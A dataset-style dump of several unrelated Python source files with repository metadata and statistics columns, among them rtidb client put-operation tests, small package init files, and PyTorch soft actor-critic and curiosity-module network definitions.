fe0c130f70206325f130f00be6c1483c9c36d113
|
[
"Apache-2.0"
] | null | null | null |
test-common/functiontest/testcase/grp_client/sut_put.py
|
imotai8915/fedb
|
fe0c130f70206325f130f00be6c1483c9c36d113
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2021 4Paradigm
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -*- coding: utf-8 -*-
from framework.test_suite import TestSuite
from job_helper import JobHelper, RtidbClient
class Put(TestSuite):
"""
put 操作
"""
def setUp(self):
pass
def tearDown(self):
pass
def testPutInvalidTid(self):
"""
不存在的table_id执行put
"""
jobHelper = JobHelper()
jobHelper.append(jobHelper.rtidbClient.create_table, tid=123)
jobHelper.append(jobHelper.rtidbClient.put, tid=456)
jobHelper.append(jobHelper.rtidbClient.scan, tid=123)
retStatus = jobHelper.run(failonerror=False, autoidentity=False)
self.assertFalse(retStatus)
self.assertEqual(0, len(jobHelper.scanout_message()))
def testPutDropedTable(self):
"""
已经drop的表执行put
"""
jobHelper = JobHelper()
jobHelper.append(jobHelper.rtidbClient.create_table)
jobHelper.append(jobHelper.rtidbClient.drop_table)
jobHelper.append(jobHelper.rtidbClient.put)
jobHelper.append(jobHelper.rtidbClient.scan)
retStatus = jobHelper.run(failonerror=False, autoidentity=False)
self.assertFalse(retStatus)
def testPutTidEmpty(self):
"""
table_id为空
"""
jobHelper = JobHelper()
jobHelper.append(jobHelper.rtidbClient.create_table)
jobHelper.append(jobHelper.rtidbClient.put, tid='')
jobHelper.append(jobHelper.rtidbClient.scan)
retStatus = jobHelper.run(failonerror=False, autoidentity=False)
self.assertFalse(retStatus)
self.assertEqual(0, len(jobHelper.scanout_message()))
def testPutTid0(self):
"""
table_id=0
"""
jobHelper = JobHelper()
jobHelper.append(jobHelper.rtidbClient.create_table, tid=0)
jobHelper.append(jobHelper.rtidbClient.put, tid=0)
jobHelper.append(jobHelper.rtidbClient.scan)
retStatus = jobHelper.run(failonerror=False, autoidentity=False)
self.assertFalse(retStatus)
def testPutPkEmpty(self):
"""
partition_key为空
"""
jobHelper = JobHelper()
jobHelper.append(jobHelper.rtidbClient.create_table)
jobHelper.append(jobHelper.rtidbClient.put, pk='')
jobHelper.append(jobHelper.rtidbClient.scan)
retStatus = jobHelper.run(autoidentity=False)
self.assertTrue(retStatus)
self.assertEqual(0, len(jobHelper.scanout_message()))
def testPutTimeStampInvalid(self):
"""
timestamp为空
"""
jobHelper = JobHelper()
jobHelper.append(jobHelper.rtidbClient.create_table)
jobHelper.append(jobHelper.rtidbClient.put, time=0)
jobHelper.append(jobHelper.rtidbClient.scan)
retStatus = jobHelper.run(failonerror=False, autoidentity=False)
self.assertTrue(retStatus)
self.assertEqual(0, len(jobHelper.scanout_message()))
def testPutValueInit(self):
"""
value是int数据
"""
jobHelper = JobHelper()
jobHelper.append(jobHelper.rtidbClient.create_table)
jobHelper.append(jobHelper.rtidbClient.put, value=123)
jobHelper.append(jobHelper.rtidbClient.scan)
retStatus = jobHelper.run()
self.assertTrue(retStatus)
def testPutValueFloat(self):
"""
value是float数据
"""
jobHelper = JobHelper()
jobHelper.append(jobHelper.rtidbClient.create_table)
jobHelper.append(jobHelper.rtidbClient.put, value=1.23)
jobHelper.append(jobHelper.rtidbClient.scan)
retStatus = jobHelper.run(failonerror=False, autoidentity=False)
self.assertTrue(retStatus)
self.assertEqual(1, len(jobHelper.scanout_message()))
def testPutValueBool(self):
"""
value是Bool
"""
jobHelper = JobHelper()
jobHelper.append(jobHelper.rtidbClient.create_table)
jobHelper.append(jobHelper.rtidbClient.put, value=True)
jobHelper.append(jobHelper.rtidbClient.scan)
retStatus = jobHelper.run(failonerror=False, autoidentity=False)
self.assertTrue(retStatus)
self.assertEqual(1, len(jobHelper.scanout_message()))
def testPutValueBig(self):
"""
value是1M string
"""
jobHelper = JobHelper()
jobHelper.append(jobHelper.rtidbClient.create_table)
jobHelper.append(jobHelper.rtidbClient.put, value='a' * 1024 * 1025)
jobHelper.append(jobHelper.rtidbClient.scan)
retStatus = jobHelper.run()
self.assertTrue(retStatus)
def testPutValueEncode(self):
"""
value是特殊编码数据
"""
jobHelper = JobHelper()
jobHelper.append(jobHelper.rtidbClient.create_table)
jobHelper.append(jobHelper.rtidbClient.put, value='ボールト')
jobHelper.append(jobHelper.rtidbClient.scan)
retStatus = jobHelper.run()
self.assertTrue(retStatus)
def testPutValueEmpty(self):
"""
value是空
"""
jobHelper = JobHelper()
jobHelper.append(jobHelper.rtidbClient.create_table)
jobHelper.append(jobHelper.rtidbClient.put, value='')
jobHelper.append(jobHelper.rtidbClient.scan)
retStatus = jobHelper.run()
self.assertTrue(retStatus)
def testPutValueNone(self):
"""
value是空
"""
jobHelper = JobHelper()
jobHelper.append(jobHelper.rtidbClient.create_table)
jobHelper.append(jobHelper.rtidbClient.put, value=None)
jobHelper.append(jobHelper.rtidbClient.scan)
retStatus = jobHelper.run(failonerror=False, autoidentity=False)
self.assertTrue(retStatus)
self.assertEqual(1, len(jobHelper.scanout_message()))
| 30.7343
| 76
| 0.661584
| 613
| 6,362
| 6.822186
| 0.23491
| 0.196078
| 0.229555
| 0.334768
| 0.751076
| 0.740316
| 0.709469
| 0.709469
| 0.695122
| 0.66308
| 0
| 0.009866
| 0.235303
| 6,362
| 206
| 77
| 30.883495
| 0.849743
| 0.12276
| 0
| 0.660377
| 0
| 0
| 0.000955
| 0
| 0
| 0
| 0
| 0
| 0.188679
| 1
| 0.141509
| false
| 0.018868
| 0.018868
| 0
| 0.169811
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
6b3da61ca0ee72ef582af247496e090798287700
| 21
|
py
|
Python
|
pystae/__init__.py
|
mynameisvinn/PyStae
|
3340f001f7c468c23f6b062bcc47987b790c7f8c
|
[
"MIT"
] | null | null | null |
pystae/__init__.py
|
mynameisvinn/PyStae
|
3340f001f7c468c23f6b062bcc47987b790c7f8c
|
[
"MIT"
] | null | null | null |
pystae/__init__.py
|
mynameisvinn/PyStae
|
3340f001f7c468c23f6b062bcc47987b790c7f8c
|
[
"MIT"
] | null | null | null |
from pystae import *
| 21
| 21
| 0.761905
| 3
| 21
| 5.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.190476
| 21
| 1
| 21
| 21
| 0.941176
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
6b4111bb8594aec92ad547dfa0ab44540b5816ce
| 77
|
py
|
Python
|
OpenCart/pages/wish_page_list.py
|
turovod/Otus
|
57433c6944bca155177b07ff361139ff30f7f692
|
[
"MIT"
] | null | null | null |
OpenCart/pages/wish_page_list.py
|
turovod/Otus
|
57433c6944bca155177b07ff361139ff30f7f692
|
[
"MIT"
] | null | null | null |
OpenCart/pages/wish_page_list.py
|
turovod/Otus
|
57433c6944bca155177b07ff361139ff30f7f692
|
[
"MIT"
] | null | null | null |
from OpenCart.pages import BasePage
class WishListPage(BasePage):
pass
| 12.833333
| 35
| 0.779221
| 9
| 77
| 6.666667
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.168831
| 77
| 5
| 36
| 15.4
| 0.9375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
862ab6ae93fa4a412994cac39835b9722acbcc94
| 137
|
py
|
Python
|
asgi.py
|
backwardspy/randnd
|
7ab93a5374b7286dd62c3a135092f120f8d1e1f8
|
[
"MIT"
] | null | null | null |
asgi.py
|
backwardspy/randnd
|
7ab93a5374b7286dd62c3a135092f120f8d1e1f8
|
[
"MIT"
] | null | null | null |
asgi.py
|
backwardspy/randnd
|
7ab93a5374b7286dd62c3a135092f120f8d1e1f8
|
[
"MIT"
] | null | null | null |
"""
Simply exposes proxy.server.app for use in a WSGI server.
"""
from proxy.server import app # noqa, pylint: disable=unused-import
| 22.833333
| 69
| 0.722628
| 21
| 137
| 4.714286
| 0.761905
| 0.222222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.167883
| 137
| 5
| 70
| 27.4
| 0.868421
| 0.686131
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
866f3b7ae341e4d316f5350e4229e39b3db1a000
| 359
|
py
|
Python
|
instagram_api/response/model/unpredictable/__init__.py
|
Yuego/instagram_api
|
b53f72db36c505a2eb24ebac1ba8267a0cc295bb
|
[
"MIT"
] | 13
|
2019-08-07T21:24:34.000Z
|
2020-12-12T12:23:50.000Z
|
instagram_api/response/model/unpredictable/__init__.py
|
Yuego/instagram_api
|
b53f72db36c505a2eb24ebac1ba8267a0cc295bb
|
[
"MIT"
] | null | null | null |
instagram_api/response/model/unpredictable/__init__.py
|
Yuego/instagram_api
|
b53f72db36c505a2eb24ebac1ba8267a0cc295bb
|
[
"MIT"
] | null | null | null |
# TODO: realyze
from .core import CoreUnpredictableContainer
from .direct_thread_last_seen_at import DirectThreadLastSeenAtUnpredictableContainer
from .friendship_status import FriendshipStatusUnpredictableContainer
from .presence import PresenceUnpredictableContainer
from .reel import ReelUnpredictableContainer
from .user import UserUnpredictableContainer
| 44.875
| 84
| 0.902507
| 31
| 359
| 10.290323
| 0.677419
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075209
| 359
| 7
| 85
| 51.285714
| 0.960843
| 0.036212
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
869f3cf6e4975aa0f344f1262f0831fef81a782a
| 122
|
py
|
Python
|
Algorithms/Recursion/powerOfTwo.py
|
ashirwadsangwan/Python
|
b4e570bb31783178d241b9f2a7145343d830b698
|
[
"MIT"
] | null | null | null |
Algorithms/Recursion/powerOfTwo.py
|
ashirwadsangwan/Python
|
b4e570bb31783178d241b9f2a7145343d830b698
|
[
"MIT"
] | null | null | null |
Algorithms/Recursion/powerOfTwo.py
|
ashirwadsangwan/Python
|
b4e570bb31783178d241b9f2a7145343d830b698
|
[
"MIT"
] | 1
|
2022-02-22T16:08:43.000Z
|
2022-02-22T16:08:43.000Z
|
def power_of_two(x):
if x == 1:
return True
if x < 1:
return False
return power_of_two(x / 2)
| 17.428571
| 30
| 0.532787
| 21
| 122
| 2.904762
| 0.52381
| 0.229508
| 0.327869
| 0.360656
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.039474
| 0.377049
| 122
| 6
| 31
| 20.333333
| 0.763158
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
86e90b148a99349aec965559c61ddb0b7b9a1cb4
| 327
|
py
|
Python
|
test.py
|
eliteraspberries/python-libnu
|
869945fc3f0d4c7ebbc9a4e66f3aa6700472b0f3
|
[
"0BSD"
] | null | null | null |
test.py
|
eliteraspberries/python-libnu
|
869945fc3f0d4c7ebbc9a4e66f3aa6700472b0f3
|
[
"0BSD"
] | null | null | null |
test.py
|
eliteraspberries/python-libnu
|
869945fc3f0d4c7ebbc9a4e66f3aa6700472b0f3
|
[
"0BSD"
] | null | null | null |
#!/usr/bin/env python
import numpy
def abserror(a, b):
return numpy.abs(a - b)
def relerror(a, b):
return abserror(a, b) / max(numpy.abs(a), numpy.abs(b))
def eq(a, b, e):
if type(a) == numpy.ndarray:
return all(abserror(a, b) < e)
return abserror(a, b) < e
if __name__ == '__main__':
pass
| 14.863636
| 59
| 0.584098
| 55
| 327
| 3.327273
| 0.418182
| 0.076503
| 0.218579
| 0.174863
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.244648
| 327
| 21
| 60
| 15.571429
| 0.740891
| 0.061162
| 0
| 0
| 0
| 0
| 0.026144
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.272727
| false
| 0.090909
| 0.090909
| 0.181818
| 0.727273
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 6
|
8107d530372206014a393e94e2f2af0f7d510088
| 85
|
py
|
Python
|
sandbox/src1/TCSE3-3rd-examples/src/tools/py4cs/__init__.py
|
sniemi/SamPy
|
e048756feca67197cf5f995afd7d75d8286e017b
|
[
"BSD-2-Clause"
] | 5
|
2016-05-28T14:12:28.000Z
|
2021-04-22T10:23:12.000Z
|
sandbox/src1/TCSE3-3rd-examples/src/tools/py4cs/__init__.py
|
sniemi/SamPy
|
e048756feca67197cf5f995afd7d75d8286e017b
|
[
"BSD-2-Clause"
] | null | null | null |
sandbox/src1/TCSE3-3rd-examples/src/tools/py4cs/__init__.py
|
sniemi/SamPy
|
e048756feca67197cf5f995afd7d75d8286e017b
|
[
"BSD-2-Clause"
] | 2
|
2015-07-13T10:04:10.000Z
|
2021-04-22T10:23:23.000Z
|
# load py4cs as scitools:
import scitools
import sys
sys.modules['py4cs'] = scitools
| 17
| 31
| 0.764706
| 12
| 85
| 5.416667
| 0.583333
| 0.430769
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.027397
| 0.141176
| 85
| 4
| 32
| 21.25
| 0.863014
| 0.270588
| 0
| 0
| 0
| 0
| 0.083333
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d4974695863affa2496322708e96da9d8188df9d
| 65
|
py
|
Python
|
vega/core/scheduler/__init__.py
|
qixiuai/vega
|
3e6588ea4aedb03e3594a549a97ffdb86adb88d1
|
[
"MIT"
] | 12
|
2020-12-13T08:34:24.000Z
|
2022-03-20T15:17:17.000Z
|
vega/core/scheduler/__init__.py
|
qixiuai/vega
|
3e6588ea4aedb03e3594a549a97ffdb86adb88d1
|
[
"MIT"
] | 3
|
2021-03-31T20:15:40.000Z
|
2022-02-09T23:50:46.000Z
|
built-in/TensorFlow/Research/cv/image_classification/Darts_for_TensorFlow/automl/vega/core/scheduler/__init__.py
|
Huawei-Ascend/modelzoo
|
df51ed9c1d6dbde1deef63f2a037a369f8554406
|
[
"Apache-2.0"
] | 2
|
2021-07-10T12:40:46.000Z
|
2021-12-17T07:55:15.000Z
|
from .master import Master
from .local_master import LocalMaster
| 21.666667
| 37
| 0.846154
| 9
| 65
| 6
| 0.555556
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123077
| 65
| 2
| 38
| 32.5
| 0.947368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d4df22a20fb8738b0eb0f771c27afdbbead7db93
| 47
|
py
|
Python
|
opennem/core/facility/__init__.py
|
paulculmsee/opennem
|
9ebe4ab6d3b97bdeebc352e075bbd5c22a8ddea1
|
[
"MIT"
] | 22
|
2020-06-30T05:27:21.000Z
|
2022-02-21T12:13:51.000Z
|
opennem/core/facility/__init__.py
|
paulculmsee/opennem
|
9ebe4ab6d3b97bdeebc352e075bbd5c22a8ddea1
|
[
"MIT"
] | 71
|
2020-08-07T13:06:30.000Z
|
2022-03-15T06:44:49.000Z
|
opennem/core/facility/__init__.py
|
paulculmsee/opennem
|
9ebe4ab6d3b97bdeebc352e075bbd5c22a8ddea1
|
[
"MIT"
] | 13
|
2020-06-30T03:28:32.000Z
|
2021-12-30T08:17:16.000Z
|
from .fueltechs import parse_facility_fueltech
| 23.5
| 46
| 0.893617
| 6
| 47
| 6.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085106
| 47
| 1
| 47
| 47
| 0.930233
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d4ed149dab3d253c1d54afcb385109e293787b98
| 13,166
|
py
|
Python
|
models/SAC_sumo_model.py
|
punk95/Continual-Learning-With-Curiosity
|
af0c507040e1352beb8740b6b3a7849417fc879a
|
[
"MIT"
] | 2
|
2021-07-12T17:11:35.000Z
|
2021-07-13T05:56:30.000Z
|
models/SAC_sumo_model.py
|
punk95/Continual-Learning-With-Curiosity
|
af0c507040e1352beb8740b6b3a7849417fc879a
|
[
"MIT"
] | null | null | null |
models/SAC_sumo_model.py
|
punk95/Continual-Learning-With-Curiosity
|
af0c507040e1352beb8740b6b3a7849417fc879a
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
import torch.nn.functional as F
from util.weight_initalizer import weight_initialize, bias_initialize
import numpy as np
from models.base import NN_Paramters, BaseNN
#for soft actor critic
LOG_SIG_MAX = 2
LOG_SIG_MIN = -20
epsilon = 1e-6
class Continuous_Gaussian_Policy_Sumo(BaseNN):
# adapted from https://github.com/pranz24/pytorch-soft-actor-critic/blob/master/model.py
def __init__(self, nn_params, save_path, load_path, action_space=None):
super(Continuous_Gaussian_Policy_Sumo, self).__init__(save_path=save_path, load_path=load_path)
self.layers = nn.ModuleList([])
self.nn_params = nn_params
self.non_lin = self.nn_params.non_linearity
self.batch_size = None
# Hidden layers
layer_input_dim = self.nn_params.state_dim
hidden_layer_dim = self.nn_params.hidden_layer_dim
for i, dim in enumerate(hidden_layer_dim):
l = nn.Linear(layer_input_dim, dim)
self.weight_init(l, self.nn_params.weight_initializer, self.nn_params.bias_initializer)
self.layers.append(l)
layer_input_dim = dim
# Final Layer
self.mean = nn.Linear(layer_input_dim, self.nn_params.action_dim)
self.weight_init(self.mean, self.nn_params.weight_initializer, self.nn_params.bias_initializer)
self.log_std = nn.Linear(layer_input_dim, self.nn_params.action_dim)
self.weight_init(self.log_std, self.nn_params.weight_initializer, self.nn_params.bias_initializer)
self.to(self.nn_params.device)
# action rescaling
if action_space is None:
self.action_scale = torch.tensor(1.).to(self.nn_params.device)
self.action_bias = torch.tensor(0.).to(self.nn_params.device)
else:
self.action_scale = torch.FloatTensor(
(action_space.high - action_space.low) / 2.).to(self.nn_params.device)
self.action_bias = torch.FloatTensor(
(action_space.high + action_space.low) / 2.).to(self.nn_params.device)
def forward(self, state):
if type(state) != torch.Tensor:
state = torch.Tensor(state).to(self.nn_params.device)
self.batch_size = state.size()[0]
if len(state.shape) == 3:
state = torch.flatten(state)
else:
state = torch.flatten(state, start_dim=1)
inp = state
for i, layer in enumerate(self.layers):
if self.non_lin != None:
inp = self.non_lin(layer(inp))
else:
inp = layer(inp)
mean = self.mean(inp)
log_std = self.log_std(inp)
log_std = torch.clamp(log_std, min=LOG_SIG_MIN, max=LOG_SIG_MAX)
return mean, log_std
def sample_with_std(self, state, format="torch"):
mean, log_std = self.forward(state=state)
std = log_std.exp()
gaussian = torch.distributions.Normal(loc=mean, scale=std)
# sample for reparametrization trick
x_t = gaussian.rsample()
y_t = torch.tanh(x_t)
action = y_t * self.action_scale + self.action_bias
log_prob = gaussian.log_prob(x_t)
# Enforcing Action Bound
log_prob -= torch.log(self.action_scale * (1 - y_t.pow(2)) + epsilon)
if len(log_prob.shape) != 1:
log_prob = log_prob.sum(1, keepdim=True)
mean = torch.tanh(mean) * self.action_scale + self.action_bias
if format == "torch":
return action, log_prob, mean, std
else:
return action.cpu().detach().numpy(), log_prob.cpu().detach().numpy(), mean.cpu().detach().numpy(), std.cpu().detach().numpy()
def sample(self, state, format="torch"):
mean , log_std = self.forward(state=state)
std = log_std.exp()
gaussian = torch.distributions.Normal(loc=mean, scale=std)
#sample for reparametrization trick
x_t = gaussian.rsample()
y_t = torch.tanh(x_t)
action = y_t * self.action_scale + self.action_bias
log_prob = gaussian.log_prob(x_t)
# Enforcing Action Bound
log_prob -= torch.log(self.action_scale * (1 - y_t.pow(2)) + epsilon)
if len(log_prob.shape) != 1:
log_prob = log_prob.sum(1, keepdim=True)
mean = torch.tanh(mean) * self.action_scale + self.action_bias
if format == "torch":
return action, log_prob, mean
else:
return action.cpu().detach().numpy(), log_prob.cpu().detach().numpy(), mean.cpu().detach().numpy()
def to(self, device):
super().to(device)
self.nn_params.device= device
class Q_Function_sumo_NN(BaseNN):
def __init__(self, nn_params, save_path, load_path):
super(Q_Function_sumo_NN, self).__init__(save_path=save_path, load_path=load_path)
self.layers = nn.ModuleList([])
self.nn_params = nn_params
self.non_lin = self.nn_params.non_linearity
# Hidden layers
layer_input_dim = self.nn_params.state_dim + self.nn_params.action_dim
hidden_layer_dim = self.nn_params.hidden_layer_dim
for i, dim in enumerate(hidden_layer_dim):
l = nn.Linear(layer_input_dim, dim)
self.weight_init(l, self.nn_params.weight_initializer, self.nn_params.bias_initializer)
self.layers.append(l)
layer_input_dim = dim
#Final Layer
self.Q_value = nn.Linear(layer_input_dim, 1)
self.weight_init(self.Q_value, self.nn_params.weight_initializer, self.nn_params.bias_initializer)
self.to(self.nn_params.device)
def forward(self, state, action):
if type(state) != torch.Tensor:
state = torch.Tensor(state).to(self.nn_params.device)
if type(action) != torch.Tensor:
action = torch.Tensor(action).to(self.nn_params.device)
if len(state.shape) == 3:
state = torch.flatten(state)
else:
state = torch.flatten(state, start_dim=1)
inp = torch.cat((state, action), dim= 1)
for i, layer in enumerate(self.layers):
if self.non_lin != None:
inp = self.non_lin(layer(inp))
else:
inp = layer(inp)
Q_s_a = self.Q_value(inp)
return Q_s_a
def get_value(self, state, action, format="torch"):
if format == "torch":
return self.forward(state, action)
elif format == "numpy":
return self.forward(state, action).cpu().detach().numpy()
def to(self, device):
super().to(device)
self.nn_params.device= device
class ICM_Next_State_sumo_NN(BaseNN):
def __init__(self, nn_params, save_path, load_path, state_action=True):
super(ICM_Next_State_sumo_NN, self).__init__(save_path=save_path, load_path=load_path)
self.layers = nn.ModuleList([])
self.nn_params = nn_params
self.non_lin = self.nn_params.non_linearity
layer_input_dim = self.nn_params.state_dim + self.nn_params.action_dim
hidden_layer_dim = self.nn_params.hidden_layer_dim
for i, dim in enumerate(hidden_layer_dim):
l = nn.Linear(layer_input_dim, dim)
self.weight_init(l, self.nn_params.weight_initializer, self.nn_params.bias_initializer)
self.layers.append(l)
layer_input_dim = dim
# Final Layer
self.next_state = nn.Linear(layer_input_dim, self.nn_params.state_dim)
self.weight_init(self.next_state, self.nn_params.weight_initializer, self.nn_params.bias_initializer)
self.to(self.nn_params.device)
def forward(self, state, action):
if type(state) != torch.Tensor:
state = torch.Tensor(state).to(self.nn_params.device)
if type(action) != torch.Tensor:
action = torch.Tensor(action).to(self.nn_params.device)
if len(state.shape) == 3:
state = torch.flatten(state)
else:
state = torch.flatten(state, start_dim=1)
if len(state.size()) == 1:
inp = torch.cat((state, action), dim=0)
else:
inp = torch.cat((state, action), dim=1)
for i, layer in enumerate(self.layers):
if self.non_lin != None:
inp = self.non_lin(layer(inp))
else:
inp = layer(inp)
next_state_pred = self.next_state(inp)
return next_state_pred
def get_next_state(self, state, action, format="torch"):
next_state = self.forward(state, action)
if format == "torch":
return next_state
else:
return next_state.cpu().detach().numpy()
def to(self, device):
super().to(device)
self.nn_params.device = device
class ICM_Action_sumo_NN(BaseNN):
def __init__(self, nn_params, save_path, load_path, state_action=True):
super(ICM_Action_sumo_NN, self).__init__(save_path=save_path, load_path=load_path)
print("cur_init")
self.layers = nn.ModuleList([])
self.nn_params = nn_params
self.non_lin = self.nn_params.non_linearity
layer_input_dim = self.nn_params.state_dim + self.nn_params.state_dim
hidden_layer_dim = self.nn_params.hidden_layer_dim
for i, dim in enumerate(hidden_layer_dim):
l = nn.Linear(layer_input_dim, dim)
self.weight_init(l, self.nn_params.weight_initializer, self.nn_params.bias_initializer)
self.layers.append(l)
layer_input_dim = dim
# Final Layer
self.action = nn.Linear(layer_input_dim, self.nn_params.action_dim)
self.weight_init(self.action, self.nn_params.weight_initializer, self.nn_params.bias_initializer)
self.to(self.nn_params.device)
def forward(self, state, next_state):
if type(state) != torch.Tensor:
state = torch.Tensor(state).to(self.nn_params.device)
if type(next_state) != torch.Tensor:
next_state = torch.Tensor(next_state).to(self.nn_params.device)
if len(state.shape) == 3:
state = torch.flatten(state)
next_state = torch.flatten(next_state)
else:
state = torch.flatten(state, start_dim=1)
next_state = torch.flatten(next_state, start_dim=1)
if len(state.size()) == 1:
inp = torch.cat((state, next_state), dim=0)
else:
inp = torch.cat((state, next_state), dim=1)
for i, layer in enumerate(self.layers):
if self.non_lin != None:
inp = self.non_lin(layer(inp))
else:
inp = layer(inp)
action_pred = self.action(inp)
return action_pred
def get_action(self, state, next_state, format="torch"):
action = self.forward(state, next_state)
if format == "torch":
return action
else:
return action.cpu().detach().numpy()
def to(self, device):
super().to(device)
self.nn_params.device = device
class ICM_Reward_sumo_NN(BaseNN):
def __init__(self, nn_params, save_path, load_path, state_action=True):
super(ICM_Reward_sumo_NN, self).__init__(save_path=save_path, load_path=load_path)
self.layers = nn.ModuleList([])
self.nn_params = nn_params
self.non_lin = self.nn_params.non_linearity
layer_input_dim = self.nn_params.state_dim + self.nn_params.action_dim
hidden_layer_dim = self.nn_params.hidden_layer_dim
for i, dim in enumerate(hidden_layer_dim):
l = nn.Linear(layer_input_dim, dim)
self.weight_init(l, self.nn_params.weight_initializer, self.nn_params.bias_initializer)
self.layers.append(l)
layer_input_dim = dim
# Final Layer
self.reward = nn.Linear(layer_input_dim, 1)
self.weight_init(self.reward, self.nn_params.weight_initializer, self.nn_params.bias_initializer)
self.to(self.nn_params.device)
def forward(self, state, action):
if type(state) != torch.Tensor:
state = torch.Tensor(state).to(self.nn_params.device)
if type(action) != torch.Tensor:
action = torch.Tensor(action).to(self.nn_params.device)
if len(state.shape) == 3:
state = torch.flatten(state)
else:
state = torch.flatten(state, start_dim=1)
if len(state.size()) == 1:
inp = torch.cat((state, action), dim=0)
else:
inp = torch.cat((state, action), dim=1)
for i, layer in enumerate(self.layers):
if self.non_lin != None:
inp = self.non_lin(layer(inp))
else:
inp = layer(inp)
pred_reward = self.reward(inp)
return pred_reward
